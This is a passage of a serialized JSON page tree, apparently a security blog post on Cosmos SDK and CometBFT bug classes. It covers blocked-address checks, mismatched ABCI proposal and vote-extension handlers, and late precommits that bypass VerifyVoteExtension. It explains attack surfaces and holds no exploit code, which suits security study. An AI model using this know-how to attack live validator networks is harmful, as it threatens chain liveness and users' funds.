coins",{"type":26,"tag":137,"props":85371,"children":85372},{"style":5601},[85373],{"type":32,"value":6099},{"type":26,"tag":137,"props":85375,"children":85376},{"class":5559,"line":83553},[85377],{"type":26,"tag":137,"props":85378,"children":85379},{"style":5601},[85380],{"type":32,"value":26510},{"type":26,"tag":137,"props":85382,"children":85383},{"class":5559,"line":83566},[85384,85388,85392,85396,85400],{"type":26,"tag":137,"props":85385,"children":85386},{"style":5610},[85387],{"type":32,"value":14870},{"type":26,"tag":137,"props":85389,"children":85390},{"style":5584},[85391],{"type":32,"value":51123},{"type":26,"tag":137,"props":85393,"children":85394},{"style":5590},[85395],{"type":32,"value":66987},{"type":26,"tag":137,"props":85397,"children":85398},{"style":5573},[85399],{"type":32,"value":84520},{"type":26,"tag":137,"props":85401,"children":85402},{"style":5601},[85403],{"type":32,"value":5875},{"type":26,"tag":137,"props":85405,"children":85406},{"class":5559,"line":83574},[85407,85411,85415,85419,85423,85427,85432,85436,85440],{"type":26,"tag":137,"props":85408,"children":85409},{"style":5610},[85410],{"type":32,"value":18336},{"type":26,"tag":137,"props":85412,"children":85413},{"style":5584},[85414],{"type":32,"value":84836},{"type":26,"tag":137,"props":85416,"children":85417},{"style":5601},[85418],{"type":32,"value":470},{"type":26,"tag":137,"props":85420,"children":85421},{"style":5682},[85422],{"type":32,"value":84553},{"type":26,"tag":137,"props":85424,"children":85425},{"style":5601},[85426],{"type":32,"value":165},{"type":26,"tag":137,"props":85428,"children":85429},{"style":6837},[85430],{"type":32,"value":85431},"\"failed to send coins: %w\"",{"type":26,"tag":137,"props":85433,"children":85434},{"style":5601},[85435],{"type":32,"value":1108},{"type":26,"tag":137,"props":85437,"children":85438},{"style":5584},[85439],{"type":32,"value":51022},{"type":26,"tag":137,"props":85441,"children":85442},{"style":5601},[85443],{"type":32,"value":5742},{"type":26,"tag":137,"props":85445,"children":85446},{"class":5559,"line":83582},[85447],{"type":26,"tag":137,"props":85448,"children":85449},{"style":5601},[85450],{"type":32,"value":5945},{"type":26,"tag":137,"props":85452,"children":85453},{"class":5559,"line":83590},[85454],{"type":26,"tag":137,"props":85455,"children":85456},{"style":5590},[85457],{"type":32,"value":22933},{"type":26,"tag":137,"props":85459,"children":85460},{"class":5559,"line":83630},[85461],{"type":26,"tag":137,"props":85462,"children":85463},{"style":5601},[85464],{"type":32,"value":6507},{"type":26,"tag":5512,"props":85466,"children":85468},{"code":85467,"language":78767,"meta":7,"className":78768,"style":7},"func (k BaseKeeper) SendCoinsFromModuleToAccount(\n ctx context.Context, senderModule string, recipientAddr sdk.AccAddress, amt sdk.Coins,\n) error {\n ...\n if k.BlockedAddr(recipientAddr) {\n  return errorsmod.Wrapf(sdkerrors.ErrUnauthorized, \"%s is not allowed to receive funds\", recipientAddr)\n }\n ...\n}\n",[85469],{"type":26,"tag":130,"props":85470,"children":85471},{"__ignoreMap":7},[85472,85504,85583,85598,85606,85637,85695,85702,85709],{"type":26,"tag":137,"props":85473,"children":85474},{"class":5559,"line":5560},[85475,85479,85483,85487,85492,85496,85500],{"type":26,"tag":137,"props":85476,"children":85477},{"style":5573},[85478],{"type":32,"value":78903},{"type":26,"tag":137,"props":85480,"children":85481},{"style":5601},[85482],{"type":32,"value":4625},{"type":26,"tag":137,"props":85484,"children":85485},{"style":5584},[85486],{"type":32,"value":83730},{"type":26,"tag":137,"props":85488,"children":85489},{"style":6009},[85490],{"type":32,"value":85491},"BaseKeeper",{"type":26,"tag":137,"props":85493,"children":85494},{"style":5601},[85495],{"type":32,"value":5671},{"type":26,"tag":137,"props":85497,"children":85498},{"style":5682},[85499],{"type":32,"value":84245},{"type":26,"tag":137,"props":85501,"children":85502},{"style":5601},[85503],{"type":32,"value":6054},{"type":26,"tag":137,"props":85505,"children":85506},{"class":5559,"line":5412},[85507,85511,85515,85519,85523,85527,85532,85536,85540,85545,85549,85553,85557,85561,85566,85570,85574,85579],{"type":26,"tag":137,"props":85508,"children":85509},{"style":5584},[85510],{"type":32,"value":28435},{"type":26,"tag":137,"props":85512,"children":85513},{"style":6009},[85514],{"type":32,"value":78943},{"type":26,"tag":137,"props":85516,"children":85517},{"style":5601},[85518],{"type":32,"value":470},{"type":26,"tag":137,"props":85520,"children":85521},{"style":6009},[85522],{"type":32,"value":78952},{"type":26,"tag":137,"props":85524,"children":85525},{"style":5601},[85526],{"type":32,"value":1108},{"type":26,"tag":137,"props":85528,"children":85529},{"style":5584},[85530],{"type":32,"value":85531},"senderModule",{"type":26,"tag":137,"props":85533,"children":85534},{"style":6009},[85535],{"type":32,"value":38625},{"type":26,"tag":137,"props":85537,"children":85538},{"style":5601},[85539],{"type":32,"value":1108},{"type":26,"tag":137,"props":85541,"children":85542},{"style":5584},[85543],{"type":32,"value":85544},"recipientAddr",{"type":26,"tag":137,"props":85546,"children":85547},{"style":6009},[85548],{"type":32,"value":81243},{"type":26,"tag":137,"props":85550,"children":85551},{"style":5601},[85552],{"type":32,"value":470},{"type":26,"tag":137,"props":85554,"children":85555},{"style":6009},[85556],{"type":32,"value":85230},{"type":26,"tag":137,"props":85558,"children":85559},{"style":5601},[85560],{"type":32,"value":1108},{"type":26,"tag":137,"props":85562,"children":85563},{"style":5584},[85564],{"type":32,"value":85565},"amt",{"type":26,"tag":137,"props":85567,"children":85568},{"style":6009},[85569],{"type":32,"value":81243},{"type":26,"tag":137,"props":85571,"children":85572},{"style":5601},[85573],{"type":32,"value":470},{"type":26,"tag":137,"props":85575,"children":85576},{"style":6009},[85577],{"type":32,"value":85578},"Coins",{"type":26,"tag":137,"props":85580,"children":85581},{"style":5601},[85582],{"type":32,"value":6099},{"type":26,"tag":137,"props":85584,"children":85585},{"class":5559,"line":5417},[85586,85590,85594],{"type":26,"tag":137,"props":85587,"children":85588},{"style":5601},[85589],{"type":32,"value":5671},{"type":26,"tag":137,"props":85591,"children":85592},{"style":6009},[85593],{"type":32,"value":17455},{"type":26,"tag":137,"props":85595,"children":85596},{"style":5601},[85597],{"type":32,"value":5875},{"type":26,"tag":137,"props":85599,"children":85600},{"class":5559,"line":5642},[85601],{"type":26,"tag":137,"props":85602,"children":85603},{"style":5590},[85604],{"type":32,"value":85605}," ...\n",{"type":26,"tag":137,"props":85607,"children":85608},{"class":5559,"line":5745},[85609,85613,85617,85621,85625,85629,85633],{"type":26,"tag":137,"props":85610,"children":85611},{"style":5610},[85612],{"type":32,"value":18380},{"type":26,"tag":137,"props":85614,"children":85615},{"style":5584},[85616],{"type":32,"value":83858},{"type":26,"tag":137,"props":85618,"children":85619},{"style":5601},[85620],{"type":32,"value":470},{"type":26,"tag":137,"props":85622,"children":85623},{"style":5682},[85624],{"type":32,"value":84261},{"type":26,"tag":137,"props":85626,"children":85627},{"style":5601},[85628],{"type":32,"value":165},{"type":26,"tag":137,"props":85630,"children":85631},{"style":5584},[85632],{"type":32,"value":85544},{"type":26,"tag":137,"props":85634,"children":85635},{"style":5601},[85636],{"type":32,"value":17395},{"type":26,"tag":137,"props":85638,"children":85639},{"class":5559,"line":5850},[85640,85644,85649,85653,85657,85661,85665,85669,85674,85678,85683,85687,85691],{"type":26,"tag":137,"props":85641,"children":85642},{"style":5610},[85643],{"type":32,"value":41795},{"type":26,"tag":137,"props":85645,"children":85646},{"style":5584},[85647],{"type":32,"value":85648}," errorsmod",{"type":26,"tag":137,"props":85650,"children":85651},{"style":5601},[85652],{"type":32,"value":470},{"type":26,"tag":137,"props":85654,"children":85655},{"style":5682},[85656],{"type":32,"value":83512},{"type":26,"tag":137,"props":85658,"children":85659},{"style":5601},[85660],{"type":32,"value":165},{"type":26,"tag":137,"props":85662,"children":85663},{"style":5584},[85664],{"type":32,"value":83174},{"type":26,"tag":137,"props":85666,"children":85667},{"style":5601},[85668],{"type":32,"value":470},{"type":26,"tag":137,"props":85670,"children":85671},{"style":5584},[85672],{"type":32,"value":85673},"ErrUnauthorized",{"type":26,"tag":137,"props":85675,"children":85676},{"style":5601},[85677],{"type":32,"value":1108},{"type":26,"tag":137,"props":85679,"children":85680},{"style":6837},[85681],{"type":32,"value":85682},"\"%s is not allowed to receive funds\"",{"type":26,"tag":137,"props":85684,"children":85685},{"style":5601},[85686],{"type":32,"value":1108},{"type":26,"tag":137,"props":85688,"children":85689},{"style":5584},[85690],{"type":32,"value":85544},{"type":26,"tag":137,"props":85692,"children":85693},{"style":5601},[85694],{"type":32,"value":5742},{"type":26,"tag":137,"props":85696,"children":85697},{"class":5559,"line":5878},[85698],{"type":26,"tag":137,"props":85699,"children":85700},{"style":5601},[85701],{"type":32,"value":12185},{"type":26,"tag":137,"props":85703,"children":85704},{"class":5559,"line":5891},[85705],{"type":26,"tag":137,"props":85706,"children":85707},{"style":5590},[85708],{"type":32,"value":85605},{"type":26,"tag":137,"props":85710,"children":85711},{"class":5559,"line":5909},[85712],{"type":26,"tag":137,"props":85713,"children":85714},{"style":5601},[85715],{"type":32,"value":6507},{"type":26,"tag":35,"props":85717,"children":85718},{},[85719,85721,85728],{"type":32,"value":85720},"This shows even well-known bug classes still resurface from time to time due to unforeseen invariant violations. Additional examples include ",{"type":26,"tag":41,"props":85722,"children":85725},{"href":85723,"rel":85724},"https://hackerone.com/reports/3018307",[45],[85726],{"type":32,"value":85727},"improper decimal handling in the group module",{"type":32,"value":470},{"type":26,"tag":92,"props":85730,"children":85732},{"id":85731},"same-same-but-different",[85733],{"type":32,"value":85734},"Same, Same... But Different",{"type":26,"tag":35,"props":85736,"children":85737},{},[85738,85740,85746,85747,85753,85754,85760,85761,85767],{"type":32,"value":85739},"Cosmos exposes several consensus-level interfaces, such as ",{"type":26,"tag":130,"props":85741,"children":85743},{"className":85742},[],[85744],{"type":32,"value":85745},"PrepareProposal",{"type":32,"value":1108},{"type":26,"tag":130,"props":85748,"children":85750},{"className":85749},[],[85751],{"type":32,"value":85752},"ProcessProposal",{"type":32,"value":1108},{"type":26,"tag":130,"props":85755,"children":85757},{"className":85756},[],[85758],{"type":32,"value":85759},"ExtendVote",{"type":32,"value":3525},{"type":26,"tag":130,"props":85762,"children":85764},{"className":85763},[],[85765],{"type":32,"value":85766},"VerifyVoteExtension",{"type":32,"value":85768},". These ABCI methods allow developers to customize how blocks are constructed, as well as inject supplementary data into each block.",{"type":26,"tag":35,"props":85770,"children":85771},{},[85772],{"type":32,"value":85773},"Two of the best-known attack surfaces are",{"type":26,"tag":4820,"props":85775,"children":85776},{},[85777,85806],{"type":26,"tag":3430,"props":85778,"children":85779},{},[85780,85785,85786,85791,85793,85798,85799,85804],{"type":26,"tag":130,"props":85781,"children":85783},{"className":85782},[],[85784],{"type":32,"value":85745},{"type":32,"value":4625},{"type":26,"tag":130,"props":85787,"children":85789},{"className":85788},[],[85790],{"type":32,"value":85759},{"type":32,"value":85792},") outputs being rejected due to ",{"type":26,"tag":130,"props":85794,"children":85796},{"className":85795},[],[85797],{"type":32,"value":85752},{"type":32,"value":4625},{"type":26,"tag":130,"props":85800,"children":85802},{"className":85801},[],[85803],{"type":32,"value":85766},{"type":32,"value":85805},") over-validating, resulting in liveness failures.",{"type":26,"tag":3430,"props":85807,"children":85808},{},[85809,85811,85816,85817,85822,85824,85829,85830,85835],{"type":32,"value":85810},"Malicious proposals and vote extensions not created through the ",{"type":26,"tag":130,"props":85812,"children":85814},{"className":85813},[],[85815],{"type":32,"value":85745},{"type":32,"value":4625},{"type":26,"tag":130,"props":85818,"children":85820},{"className":85819},[],[85821],{"type":32,"value":85759},{"type":32,"value":85823},") are accepted due to ",{"type":26,"tag":130,"props":85825,"children":85827},{"className":85826},[],[85828],{"type":32,"value":85752},{"type":32,"value":4625},{"type":26,"tag":130,"props":85831,"children":85833},{"className":85832},[],[85834],{"type":32,"value":85766},{"type":32,"value":85836},") under-validating.",{"type":26,"tag":35,"props":85838,"children":85839},{},[85840],{"type":32,"value":85841},"In essence, any difference in pairs of handlers will likely lead to security issues.",{"type":26,"tag":35,"props":85843,"children":85844},{},[85845,85847,85853,85855,85860],{"type":32,"value":85846},"There are also a few lesser known variants of these issues. One instance is the validation of ",{"type":26,"tag":130,"props":85848,"children":85850},{"className":85849},[],[85851],{"type":32,"value":85852},"VoteExtensions",{"type":32,"value":85854}," within ",{"type":26,"tag":130,"props":85856,"children":85858},{"className":85857},[],[85859],{"type":32,"value":85745},{"type":32,"value":85861},". To provide context, we start with a primer on the CometBTF consensus and vote extensions.",{"type":26,"tag":35,"props":85863,"children":85864},{},[85865,85867,85872,85874,85879],{"type":32,"value":85866},"Consensus starts with a leader creating a proposal and then broadcasting it to each validator. Validators then proceed to vote on whether or not to accept the proposal. During the voting phase, ",{"type":26,"tag":130,"props":85868,"children":85870},{"className":85869},[],[85871],{"type":32,"value":85759},{"type":32,"value":85873}," is called to attach additional data to the votes. Once a validator collects enough valid votes that pass ",{"type":26,"tag":130,"props":85875,"children":85877},{"className":85876},[],[85878],{"type":32,"value":85766},{"type":32,"value":85880},", a proposal is considered accepted and can be committed. After committing the proposal, a new leader starts to create the next proposal, bringing us back to the point where we started.",{"type":26,"tag":35,"props":85882,"children":85883},{},[85884,85886,85891],{"type":32,"value":85885},"So, where are the attached vote extension data used? It turns out a leader should include the vote extensions of the previous consensus round in its proposal. It might be tempting to conclude that all vote extensions an honest leader accepted have passed the ",{"type":26,"tag":130,"props":85887,"children":85889},{"className":85888},[],[85890],{"type":32,"value":85766},{"type":32,"value":85892}," check and are therefore valid. Thus, we can directly inject all vote extensions into our proposal.",{"type":26,"tag":35,"props":85894,"children":85895},{},[85896,85898,85903,85905,85911],{"type":32,"value":85897},"Unfortunately, CometBTF directly accepts late precommits without passing them through ",{"type":26,"tag":130,"props":85899,"children":85901},{"className":85900},[],[85902],{"type":32,"value":85766},{"type":32,"value":85904},". This exposes a time window where Byzantine validators can smuggle malicious vote into the next leader's cache, luring the leader into including invalid vote extensions into its ",{"type":26,"tag":130,"props":85906,"children":85908},{"className":85907},[],[85909],{"type":32,"value":85910},"Proposal",{"type":32,"value":470},{"type":26,"tag":5512,"props":85913,"children":85915},{"code":85914,"language":78767,"meta":7,"className":78768,"style":7},"func (cs *State) addVote(vote *types.Vote, peerID p2p.ID) (added bool, err error) {\n    ...\n\n    // A precommit for the previous height?\n    // These come in while we wait timeoutCommit\n    if vote.Height+1 == cs.Height && vote.Type == types.PrecommitType {\n        ...\n        // Late precommits are not checked by VerifyVoteExtension\n        added, err = cs.LastCommit.AddVote(vote)\n        ...\n        return added, err\n    }\n    extEnabled := cs.state.ConsensusParams.Feature.VoteExtensionsEnabled(vote.Height)\n    if extEnabled {\n        ...\n        if vote.Type == types.PrecommitType && !vote.BlockID.IsNil() &&\n            !bytes.Equal(vote.ValidatorAddress, myAddr) { // Skip the VerifyVoteExtension call if the vote was issued by this validator.\n            ...\n            err := cs.blockExec.VerifyVoteExtension(context.TODO(), vote)\n            ...\n        }\n    } else if {\n        ...\n    }\n    ...\n}\n",[85916],{"type":26,"tag":130,"props":85917,"children":85918},{"__ignoreMap":7},[85919,86031,86038,86045,86053,86061,86145,86152,86160,86214,86221,86242,86249,86321,86337,86344,86418,86474,86481,86543,86550,86557,86576,86583,86590,86597],{"type":26,"tag":137,"props":85920,"children":85921},{"class":5559,"line":5560},[85922,85926,85930,85935,85939,85944,85948,85953,85957,85962,85966,85970,85974,85979,85983,85988,85993,85997,86002,86006,86011,86015,86019,86023,86027],{"type":26,"tag":137,"props":85923,"children":85924},{"style":5573},[85925],{"type":32,"value":78903},{"type":26,"tag":137,"props":85927,"children":85928},{"style":5601},[85929],{"type":32,"value":4625},{"type":26,"tag":137,"props":85931,"children":85932},{"style":5584},[85933],{"type":32,"value":85934},"cs ",{"type":26,"tag":137,"props":85936,"children":85937},{"style":5590},[85938],{"type":32,"value":7152},{"type":26,"tag":137,"props":85940,"children":85941},{"style":6009},[85942],{"type":32,"value":85943},"State",{"type":26,"tag":137,"props":85945,"children":85946},{"style":5601},[85947],{"type":32,"value":5671},{"type":26,"tag":137,"props":85949,"children":85950},{"style":5682},[85951],{"type":32,"value":85952},"addVote",{"type":26,"tag":137,"props":85954,"children":85955},{"style":5601},[85956],{"type":32,"value":165},{"type":26,"tag":137,"props":85958,"children":85959},{"style":5584},[85960],{"type":32,"value":85961},"vote",{"type":26,"tag":137,"props":85963,"children":85964},{"style":5590},[85965],{"type":32,"value":12406},{"type":26,"tag":137,"props":85967,"children":85968},{"style":6009},[85969],{"type":32,"value":8343},{"type":26,"tag":137,"props":85971,"children":85972},{"style":5601},[85973],{"type":32,"value":470},{"type":26,"tag":137,"props":85975,"children":85976},{"style":6009},[85977],{"type":32,"value":85978},"Vote",{"type":26,"tag":137,"props":85980,"children":85981},{"style":5601},[85982],{"type":32,"value":1108},{"type":26,"tag":137,"props":85984,"children":85985},{"style":5584},[85986],{"type":32,"value":85987},"peerID",{"type":26,"tag":137,"props":85989,"children":85990},{"style":6009},[85991],{"type":32,"value":85992}," p2p",{"type":26,"tag":137,"props":85994,"children":85995},{"style":5601},[85996],{"type":32,"value":470},{"type":26,"tag":137,"props":85998,"children":85999},{"style":6009},[86000],{"type":32,"value":86001},"ID",{"type":26,"tag":137,"props":86003,"children":86004},{"style":5601},[86005],{"type":32,"value":78985},{"type":26,"tag":137,"props":86007,"children":86008},{"style":5584},[86009],{"type":32,"value":86010},"added",{"type":26,"tag":137,"props":86012,"children":86013},{"style":6009},[86014],{"type":32,"value":14641},{"type":26,"tag":137,"props":86016,"children":86017},{"style":5601},[86018],{"type":32,"value":1108},{"type":26,"tag":137,"props":86020,"children":86021},{"style":5584},[86022],{"type":32,"value":51022},{"type":26,"tag":137,"props":86024,"children":86025},{"style":6009},[86026],{"type":32,"value":17468},{"type":26,"tag":137,"props":86028,"children":86029},{"style":5601},[86030],{"type":32,"value":17395},{"type":26,"tag":137,"props":86032,"children":86033},{"class":5559,"line":5412},[86034],{"type":26,"tag":137,"props":86035,"children":86036},{"style":5590},[86037],{"type":32,"value":22933},{"type":26,"tag":137,"props":86039,"children":86040},{"class":5559,"line":5417},[86041],{"type":26,"tag":137,"props":86042,"children":86043},{"emptyLinePlaceholder":18},[86044],{"type":32,"value":6276},{"type":26,"tag":137,"props":86046,"children":86047},{"class":5559,"line":5642},[86048],{"type":26,"tag":137,"props":86049,"children":86050},{"style":5564},[86051],{"type":32,"value":86052},"    // A precommit for the previous height?\n",{"type":26,"tag":137,"props":86054,"children":86055},{"class":5559,"line":5745},[86056],{"type":26,"tag":137,"props":86057,"children":86058},{"style":5564},[86059],{"type":32,"value":86060},"    // These come in while we wait timeoutCommit\n",{"type":26,"tag":137,"props":86062,"children":86063},{"class":5559,"line":5850},[86064,86068,86073,86077,86082,86086,86090,86094,86099,86103,86107,86111,86115,86119,86124,86128,86132,86136,86141],{"type":26,"tag":137,"props":86065,"children":86066},{"style":5610},[86067],{"type":32,"value":14870},{"type":26,"tag":137,"props":86069,"children":86070},{"style":5584},[86071],{"type":32,"value":86072}," vote",{"type":26,"tag":137,"props":86074,"children":86075},{"style":5601},[86076],{"type":32,"value":470},{"type":26,"tag":137,"props":86078,"children":86079},{"style":5584},[86080],{"type":32,"value":86081},"Height",{"type":26,"tag":137,"props":86083,"children":86084},{"style":5590},[86085],{"type":32,"value":356},{"type":26,"tag":137,"props":86087,"children":86088},{"style":5626},[86089],{"type":32,"value":878},{"type":26,"tag":137,"props":86091,"children":86092},{"style":5590},[86093],{"type":32,"value":5866},{"type":26,"tag":137,"props":86095,"children":86096},{"style":5584},[86097],{"type":32,"value":86098}," cs",{"type":26,"tag":137,"props":86100,"children":86101},{"style":5601},[86102],{"type":32,"value":470},{"type":26,"tag":137,"props":86104,"children":86105},{"style":5584},[86106],{"type":32,"value":86081},{"type":26,"tag":137,"props":86108,"children":86109},{"style":5590},[86110],{"type":32,"value":16776},{"type":26,"tag":137,"props":86112,"children":86113},{"style":5584},[86114],{"type":32,"value":86072},{"type":26,"tag":137,"props":86116,"children":86117},{"style":5601},[86118],{"type":32,"value":470},{"type":26,"tag":137,"props":86120,"children":86121},{"style":5584},[86122],{"type":32,"value":86123},"Type",{"type":26,"tag":137,"props":86125,"children":86126},{"style":5590},[86127],{"type":32,"value":5866},{"type":26,"tag":137,"props":86129,"children":86130},{"style":5584},[86131],{"type":32,"value":80777},{"type":26,"tag":137,"props":86133,"children":86134},{"style":5601},[86135],{"type":32,"value":470},{"type":26,"tag":137,"props":86137,"children":86138},{"style":5584},[86139],{"type":32,"value":86140},"PrecommitType",{"type":26,"tag":137,"props":86142,"children":86143},{"style":5601},[86144],{"type":32,"value":5875},{"type":26,"tag":137,"props":86146,"children":86147},{"class":5559,"line":5878},[86148],{"type":26,"tag":137,"props":86149,"children":86150},{"style":5590},[86151],{"type":32,"value":84444},{"type":26,"tag":137,"props":86153,"children":86154},{"class":5559,"line":5891},[86155],{"type":26,"tag":137,"props":86156,"children":86157},{"style":5564},[86158],{"type":32,"value":86159},"        // Late precommits are not checked by VerifyVoteExtension\n",{"type":26,"tag":137,"props":86161,"children":86162},{"class":5559,"line":5909},[86163,86168,86172,86176,86180,86184,86188,86193,86197,86202,86206,86210],{"type":26,"tag":137,"props":86164,"children":86165},{"style":5584},[86166],{"type":32,"value":86167},"        added",{"type":26,"tag":137,"props":86169,"children":86170},{"style":5601},[86171],{"type":32,"value":1108},{"type":26,"tag":137,"props":86173,"children":86174},{"style":5584},[86175],{"type":32,"value":51022},{"type":26,"tag":137,"props":86177,"children":86178},{"style":5590},[86179],{"type":32,"value":5593},{"type":26,"tag":137,"props":86181,"children":86182},{"style":5584},[86183],{"type":32,"value":86098},{"type":26,"tag":137,"props":86185,"children":86186},{"style":5601},[86187],{"type":32,"value":470},{"type":26,"tag":137,"props":86189,"children":86190},{"style":5584},[86191],{"type":32,"value":86192},"LastCommit",{"type":26,"tag":137,"props":86194,"children":86195},{"style":5601},[86196],{"type":32,"value":470},{"type":26,"tag":137,"props":86198,"children":86199},{"style":5682},[86200],{"type":32,"value":86201},"AddVote",{"type":26,"tag":137,"props":86203,"children":86204},{"style":5601},[86205],{"type":32,"value":165},{"type":26,"tag":137,"props":86207,"children":86208},{"style":5584},[86209],{"type":32,"value":85961},{"type":26,"tag":137,"props":86211,"children":86212},{"style":5601},[86213],{"type":32,"value":5742},{"type":26,"tag":137,"props":86215,"children":86216},{"class":5559,"line":5930},[86217],{"type":26,"tag":137,"props":86218,"children":86219},{"style":5590},[86220],{"type":32,"value":84444},{"type":26,"tag":137,"props":86222,"children":86223},{"class":5559,"line":5939},[86224,86228,86233,86237],{"type":26,"tag":137,"props":86225,"children":86226},{"style":5610},[86227],{"type":32,"value":18336},{"type":26,"tag":137,"props":86229,"children":86230},{"style":5584},[86231],{"type":32,"value":86232}," added",{"type":26,"tag":137,"props":86234,"children":86235},{"style":5601},[86236],{"type":32,"value":1108},{"type":26,"tag":137,"props":86238,"children":86239},{"style":5584},[86240],{"type":32,"value":86241},"err\n",{"type":26,"tag":137,"props":86243,"children":86244},{"class":5559,"line":6191},[86245],{"type":26,"tag":137,"props":86246,"children":86247},{"style":5601},[86248],{"type":32,"value":5945},{"type":26,"tag":137,"props":86250,"children":86251},{"class":5559,"line":6208},[86252,86257,86261,86265,86269,86274,86278,86283,86287,86292,86296,86301,86305,86309,86313,86317],{"type":26,"tag":137,"props":86253,"children":86254},{"style":5584},[86255],{"type":32,"value":86256},"    extEnabled",{"type":26,"tag":137,"props":86258,"children":86259},{"style":5590},[86260],{"type":32,"value":79019},{"type":26,"tag":137,"props":86262,"children":86263},{"style":5584},[86264],{"type":32,"value":86098},{"type":26,"tag":137,"props":86266,"children":86267},{"style":5601},[86268],{"type":32,"value":470},{"type":26,"tag":137,"props":86270,"children":86271},{"style":5584},[86272],{"type":32,"value":86273},"state",{"type":26,"tag":137,"props":86275,"children":86276},{"style":5601},[86277],{"type":32,"value":470},{"type":26,"tag":137,"props":86279,"children":86280},{"style":5584},[86281],{"type":32,"value":86282},"ConsensusParams",{"type":26,"tag":137,"props":86284,"children":86285},{"style":5601},[86286],{"type":32,"value":470},{"type":26,"tag":137,"props":86288,"children":86289},{"style":5584},[86290],{"type":32,"value":86291},"Feature",{"type":26,"tag":137,"props":86293,"children":86294},{"style":5601},[86295],{"type":32,"value":470},{"type":26,"tag":137,"props":86297,"children":86298},{"style":5682},[86299],{"type":32,"value":86300},"VoteExtensionsEnabled",{"type":26,"tag":137,"props":86302,"children":86303},{"style":5601},[86304],{"type":32,"value":165},{"type":26,"tag":137,"props":86306,"children":86307},{"style":5584},[86308],{"type":32,"value":85961},{"type":26,"tag":137,"props":86310,"children":86311},{"style":5601},[86312],{"type":32,"value":470},{"type":26,"tag":137,"props":86314,"children":86315},{"style":5584},[86316],{"type":32,"value":86081},{"type":26,"tag":137,"props":86318,"children":86319},{"style":5601},[86320],{"type":32,"value":5742},{"type":26,"tag":137,"props":86322,"children":86323},{"class":5559,"line":6225},[86324,86328,86333],{"type":26,"tag":137,"props":86325,"children":86326},{"style":5610},[86327],{"type":32,"value":14870},{"type":26,"tag":137,"props":86329,"children":86330},{"style":5584},[86331],{"type":32,"value":86332}," extEnabled",{"type":26,"tag":137,"props":86334,"children":86335},{"style":5601},[86336],{"type":32,"value":5875},{"type":26,"tag":137,"props":86338,"children":86339},{"class":5559,"line":6238},[86340],{"type":26,"tag":137,"props":86341,"children":86342},{"style":5590},[86343],{"type":32,"value":84444},{"type":26,"tag":137,"props":86345,"children":86346},{"class":5559,"line":6247},[86347,86351,86355,86359,86363,86367,86371,86375,86379,86383,86387,86391,86395,86400,86404,86409,86413],{"type":26,"tag":137,"props":86348,"children":86349},{"style":5610},[86350],{"type":32,"value":5856},{"type":26,"tag":137,"props":86352,"children":86353},{"style":5584},[86354],{"type":32,"value":86072},{"type":26,"tag":137,"props":86356,"children":86357},{"style":5601},[86358],{"type":32,"value":470},{"type":26,"tag":137,"props":86360,"children":86361},{"style":5584},[86362],{"type":32,"value":86123},{"type":26,"tag":137,"props":86364,"children":86365},{"style":5590},[86366],{"type":32,"value":5866},{"type":26,"tag":137,"props":86368,"children":86369},{"style":5584},[86370],{"type":32,"value":80777},{"type":26,"tag":137,"props":86372,"children":86373},{"style":5601},[86374],{"type":32,"value":470},{"type":26,"tag":137,"props":86376,"children":86377},{"style":5584},[86378],{"type":32,"value":86140},{"type":26,"tag":137,"props":86380,"children":86381},{"style":5590},[86382],{"type":32,"value":16776},{"type":26,"tag":137,"props":86384,"children":86385},{"style":5590},[86386],{"type":32,"value":15455},{"type":26,"tag":137,"props":86388,"children":86389},{"style":5584},[86390],{"type":32,"value":85961},{"type":26,"tag":137,"props":86392,"children":86393},{"style":5601},[86394],{"type":32,"value":470},{"type":26,"tag":137,"props":86396,"children":86397},{"style":5584},[86398],{"type":32,"value":86399},"BlockID",{"type":26,"tag":137,"props":86401,"children":86402},{"style":5601},[86403],{"type":32,"value":470},{"type":26,"tag":137,"props":86405,"children":86406},{"style":5682},[86407],{"type":32,"value":86408},"IsNil",{"type":26,"tag":137,"props":86410,"children":86411},{"style":5601},[86412],{"type":32,"value":16634},{"type":26,"tag":137,"props":86414,"children":86415},{"style":5590},[86416],{"type":32,"value":86417},"&&\n",{"type":26,"tag":137,"props":86419,"children":86420},{"class":5559,"line":6270},[86421,86426,86431,86435,86439,86443,86447,86451,86456,86460,86465,86469],{"type":26,"tag":137,"props":86422,"children":86423},{"style":5590},[86424],{"type":32,"value":86425},"            !",{"type":26,"tag":137,"props":86427,"children":86428},{"style":5584},[86429],{"type":32,"value":86430},"bytes",{"type":26,"tag":137,"props":86432,"children":86433},{"style":5601},[86434],{"type":32,"value":470},{"type":26,"tag":137,"props":86436,"children":86437},{"style":5682},[86438],{"type":32,"value":84900},{"type":26,"tag":137,"props":86440,"children":86441},{"style":5601},[86442],{"type":32,"value":165},{"type":26,"tag":137,"props":86444,"children":86445},{"style":5584},[86446],{"type":32,"value":85961},{"type":26,"tag":137,"props":86448,"children":86449},{"style":5601},[86450],{"type":32,"value":470},{"type":26,"tag":137,"props":86452,"children":86453},{"style":5584},[86454],{"type":32,"value":86455},"ValidatorAddress",{"type":26,"tag":137,"props":86457,"children":86458},{"style":5601},[86459],{"type":32,"value":1108},{"type":26,"tag":137,"props":86461,"children":86462},{"style":5584},[86463],{"type":32,"value":86464},"myAddr",{"type":26,"tag":137,"props":86466,"children":86467},{"style":5601},[86468],{"type":32,"value":26580},{"type":26,"tag":137,"props":86470,"children":86471},{"style":5564},[86472],{"type":32,"value":86473},"// Skip the VerifyVoteExtension call if the vote was issued by this validator.\n",{"type":26,"tag":137,"props":86475,"children":86476},{"class":5559,"line":6279},[86477],{"type":26,"tag":137,"props":86478,"children":86479},{"style":5590},[86480],{"type":32,"value":85120},{"type":26,"tag":137,"props":86482,"children":86483},{"class":5559,"line":6288},[86484,86488,86492,86496,86500,86505,86509,86513,86517,86522,86526,86531,86535,86539],{"type":26,"tag":137,"props":86485,"children":86486},{"style":5584},[86487],{"type":32,"value":84938},{"type":26,"tag":137,"props":86489,"children":86490},{"style":5590},[86491],{"type":32,"value":79019},{"type":26,"tag":137,"props":86493,"children":86494},{"style":5584},[86495],{"type":32,"value":86098},{"type":26,"tag":137,"props":86497,"children":86498},{"style":5601},[86499],{"type":32,"value":470},{"type":26,"tag":137,"props":86501,"children":86502},{"style":5584},[86503],{"type":32,"value":86504},"blockExec",{"type":26,"tag":137,"props":86506,"children":86507},{"style":5601},[86508],{"type":32,"value":470},{"type":26,"tag":137,"props":86510,"children":86511},{"style":5682},[86512],{"type":32,"value":85766},{"type":26,"tag":137,"props":86514,"children":86515},{"style":5601},[86516],{"type":32,"value":165},{"type":26,"tag":137,"props":86518,"children":86519},{"style":5584},[86520],{"type":32,"value":86521},"context",{"type":26,"tag":137,"props":86523,"children":86524},{"style":5601